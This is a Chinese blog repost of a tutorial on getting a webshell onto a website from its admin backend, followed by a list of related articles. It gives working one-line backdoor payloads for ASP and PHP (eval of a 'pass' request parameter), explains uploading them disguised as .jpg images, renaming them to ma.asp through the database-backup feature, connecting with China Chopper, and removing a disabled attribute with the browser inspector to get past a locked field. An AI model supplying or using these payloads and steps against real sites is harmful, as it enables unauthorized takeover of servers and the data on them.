数据库备份及审查元素进行webshell上传

最新推荐文章于 2024-11-29 10:53:38 发布
最新推荐文章于 2024-11-29 10:53:38 发布
阅读量162 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/baifan2618/p/7701750.html
本文介绍了一种通过上传特殊构造的文件(如带有后门的一句话木马)到目标服务器,进而获取服务器控制权的方法。该过程涉及利用网站后台上传功能及数据库备份路径的可写特性,并使用特定工具(如中国菜刀)进一步增强攻击效果。

前提:已经登入了网站的后台

1.在后台中找到一个可以上传文件的地方  (一些上传图片的地方)

2.在本机中写一个一句话木马 后缀用.jpg
    asp: <%eval request("pass")%>  pass 为自己设定的密码

    php: <?php @eval($_POST[ 'pass' ]);?>
3.找到后台数据库备份的地方


    当前数据库路径改为之前上传图片后显示的路径


    名称改为ma.asp
4.把上传后的路径添加到中国菜刀中,之后就可以获得权限




突破上传限制:
    有些时候数据库备份路径被定义为不可写


    这个时候可以通过火狐审查元素来解决
    找到那句代码 然后把后面的disabled=disabled 删掉

转载于:https://www.cnblogs.com/baifan2618/p/7701750.html

web开发中审查元素编程思路
kerryqpw的博客
06-03 1220
web开发中审查元素编程思路
Webshell检测
sunshine19871211的博客
04-14 831
即使是一款拥有99.9%的Webshell检出率的检测引擎,依然可能存在Webshell绕过的情况。 最好的方式就是做文件完整性验证。 1、文件MD5校验,将所有网站文件计算一次hash值保存,当出现应急情况时,重新计算一次hash值。 2、通过一行命令快速找出两个项目文件的差异 diff -c -a -r cms1 cms2 3、版本控制工具,如git、svn,git diff,或者在历史提...
网络安全系列之六 利用数据库备份上传WebShell
weixin_33774308的博客
10-09 292
在成功获得了网站管理员的账号和密码之后,我们就可以通过之前已经找到的后台管理入口来进入网站后台了。 此时我们就已经拿下这个网站,可以对网站的内容进行任意修改。但对于***,拿下网站绝不是目的,其最终目的是拿下整台服务器,使之成为自己的“肉鸡”。只是目前我们获得的这个网站管理员相比服务器的系统管理员的权限还有很大差距,因而下一步要做的工作就是“提权”,也就是获得系统管理员的权限。目前,提权主要是借助...
数据库备份webshell简单记录
weixin_34306676的博客
09-02 418
数据库备份webshell主要前提是能进入到应用系统后台,并且有数据库备份功能(有点废话了)!当我们想法设法进入到一个系统后台之后,本以为找一个文件上传的地方来上传一个webshell,但是上传点却是限制得死死的,高强度的白名单限制,各种绕过都没有成功,恰巧该系统后台中有数据库备份这个功能,此时我们可以通过数据库备份来拿webshell!首先我们上传...
50-webshell获取总结(cms获取方法、非cms获取方法、中间件拿Webshell方法)
XLbb的博客
06-12 2257
一、主要通过百度搜索CMS网站程序名称。如:phpcms拿Webshell、WordPress后台拿Webshell等。 二、1、数据库备份获取Webshell 2、抓包上传获取Webshell 3、Sql命令获取Webshell 4、模板修改获取Webshell 5、插入一句话获取Webshell 6、修改上传类型获取Webshell 三、其它获取Webshell方法:中间件拿Webshell方法 cookices靶场网站搭建和dedecms靶场环境搭建
getshell2aaaaaaaa
03-28
- 首先将WebShell文件格式改为允许上传的类型,然后找到文件的存储路径并通过数据库备份功能将其备份为脚本格式。 - 需要注意的是,修改数据库路径时,备份的仍然是原始数据库文件,而不是WebShell。 - 如果目标...
常见漏洞及防范措施(总结篇)
最新发布
qq_69100706的博客
11-29 1228
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种安全漏洞,攻击者通过这种漏洞可以利用受害者在已登录的网站上的身份认证信息,在不知情的情况下执行非预期的操作。与XSS(跨站脚本攻击)不同的是,XSS是利用站点内的信任用户,而CSRF则是通过伪装成受信任用户向受信任的网站发送请求SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞,攻击者通过构造恶意的URL或其他形式的数据,诱使服务器向攻击者指定的内部或外部系统发起请求。
WEB安全学习笔记
chenrs727的博客
12-02 2173
基础入门 1.基础入门——基础概念 域名 什么是域名 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置) 由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。 比如www.bai
导致线上项目宕机的原因和排查手段
Apollo
10-30 1828
线上项目宕机的原因和排查手段,应该是全网比较全面的了,不进来看看?
注册码系统全自动发卡操作流程
bby88的博客
10-21 2434
百宝云注册码系统免费版发卡操作过程       本次免费版注册码系统上线全自动发卡功能,下载安装应用后就可直接自动生卡售卡结算,无需人工操作,这样作者们不用做任何付费就可以先有收入来源,然后再根据用户自己的需求,来选择是否购买付费服务.       下面就介绍百宝云注册码系统的发卡具体操作流程      一、   安装本注册码系统免费版     二、   进入云虚拟桌面双击
前端:屏蔽F12审查元素,禁止修改页面代码
热门推荐
凉城古梦猫扑街的博客
01-25 2万+
众所周知,审查元素的情况下,大家都可以随机更改一部分页面的代码, 注入恶意JS等等,这种情况避免也不难,虽然还能看到一部分H5源码,但是无法修改 一、屏蔽F12 审查元素 document.onkeydown = function(){ if(window.event && window.event.keyCode == 123) { alert("F
关于避免审查元素时,修改数据和提交数据,造成恶意审查修改的方法总结
bingcool
10-13 2万+
作为一名程序员或者用户,都知道在浏览器审查元素时,是可以修改数据的,如果修改数据,在提交就会造成不可预想的后果,特别是在数据安全的领域。一般查询数据都会返回记录的id,和一些关键的信息,虽然这些信息不是显然地在前端显示出来,但是一般会隐藏在input框或者一个data-的属性中,在修改,删除记录时,把id以get或者post的形式将数据传递给服务端,诺任意修改了id的值,就会恶意误删数据(可能是别
WebShell的经验
Air的博客
07-28 423
 拿WebShell的经验 通过几次成功的拿Webshell,发现自己有时也走了一些弯路,为了避免其他的朋友再在困惑中迷失方向,现在我将自己的一些经验写出来,希望对一些想学拿Webshell的朋友有一定的帮助。   首先我们要确定我们要检测的网站,可以是自己定下的某个网站,也可以是自己通过Google或者Baidu搜索得到的,遇到ASP这样的动态网站入侵成功率是最佳的。不详细说了,这一
采用审计数据库监视数据库的更改
冯立彬的博客
07-26 5692
有些时候我们需要知道数据表做了什么样的更改,写入了什么样的语句,这个时候可以采用审计数据库来做这个工作,用以记录需要的信息,但是配置过程有点烦,下面是一篇CHINAUNIX上面的文章,说如何配置审计数据库: http://bbs.chinaunix.net/archiver/?tid-560903.html 本文出自:冯立彬的博客
steam审查元素免费得到几十款游戏教程
05-06 7642
没steam号的话先注册一个然后登陆steam账号之后,再打开这个链接 https://store.steampowered.com/account/licenses/ 之后右键审查元素------找到Console------输入代码------然后回车键------游戏秒到账代码:(function(){if( location.href.match( /^https:\/\/store\.s...
hive和cm 安装不在同一机器 HiveMetaException:Failed load the driver
weixin_42319892的博客
09-15 180
发现/opt/cloudera/parcels/CDH-5.14.2-1.cdh5.14.2.p0.3/lib/hive/lib/mysql-connector-java-5.1.36.jar没有
SQL数据库差异备份WebShell隐藏技术分析
- 为了防止Webshell的滥用,应定期审查数据库日志,监控异常的备份和恢复操作。 - 应该限制对备份和恢复操作的访问权限,确保只有授权人员可以执行这些操作。 - 定期更新数据库软件和打补丁,以减少SQL注入等安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值